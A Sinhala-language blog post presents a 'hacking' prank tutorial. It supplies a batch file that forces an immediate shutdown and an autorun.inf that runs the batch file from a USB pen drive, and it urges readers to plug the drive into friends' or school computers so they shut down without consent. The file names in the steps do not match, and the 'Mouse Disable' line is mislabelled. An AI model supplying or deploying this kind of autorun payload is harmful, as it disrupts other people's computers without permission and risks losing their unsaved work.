නොට් පෑඩ් එකෙන් යාළුවන්ගේ පරිගණක වලට ගේම දෙමු

හලෝ ඔන්න ඉතින් ලග ලගම අලුත් පොස්ට් එකක් බස්සන්න හිතුන නිසා පොඩි හැකින් ආතල් එකක් ගන්න හිතුවා යලුවෙක්ට ගේම දෙන්න නියම බාන්ඩේ හැකින් කිව්වාට  ඉතින් තවත් නොට් ප ගේමක් තමා දන්නවානේ ඉතින් අපෙ අය හැකින් කියන්නේ මෙව්වට නොවැ හාරි මේ වැඩේන් අපි ලොකු එකක් ගන්න හැකි වෙයි කියලා හිතනවා එහෙනම් වැඩේට බහිමුකො





  • මුලින්ම මේ code එක notepad එකට copy කරල past කරන්න කො ඉට පස්සේ එක ඔයාට කැමති නමක් දිලා කරගන්න හැබයි extension එකට .bat කියල දෙන්නපහල පින්තුරෙ වගේ
@echo off

shutdown -s -t 00



ex: anyname.bat



  • හරි දැන් අයෙත් notepad එක කරගෙන මේ code එකත්  past කරලා autorun.inf කියලා name එක දිලා save කරගන්නකො මේකේදි ඔයාලට name වෙනස් කරනන් බැ හොදේ


[autorun]
Open=besthacking.bat
Action=Mouse Disable 

ex: autorun.inf

  • ඔන්න හරි පුතේ ඔය දැන් අපි හදාගත්ත file දෙක pen එකකට දාලා යලුවෙක්ට හරි ඉස්කෝලේට හරි ගෙනිහින් pen එක ගහුවා නම් වැඩේ පත්තුවෙයි ගින්දර වගේ ඔයාගෙන් අහන්නෙම නැතුව කොම්පුටරේ off වෙලා යයි on කරන හැම පාරම ඔක කරා වගේ නෙමේ නේ නවත්තන හැටිත් දැන ගන්න එපැයි නෙද මහලොකු දෙයක් නැ task maneger එකෙන් ගිහින් autorun කියන prosess එක නැවත්තුවනම් අහවරයි  ඔන්න ඉතින් මෙව්වා සිගිති ආතල් කියලා නම් කියන්න එපා පුතො මොකද දන්නේ නැති අයත් ඇති නොවැ ගොහින් එන්ටම්කො මම බිසී වෙලා ඉන්න වෙලාවේ පොස්ට් දාන්න උදවු කරන්නේ ලහිරු කසුන් මගේ හොදම බොක්කක් එයාට ගොඩක් ස්තුති වෙන්න ඕනේ.


Previous
Next Post »

2 comments

Click here for comments

මේ ලිපිය ඔයාලට හොදයි කියල හිතෙනවනම් අපිව දිරිමත් කරන්න කමෙන්ට් එකක් දාන්න යාලුවනේ.
ConversionConversion EmoticonEmoticon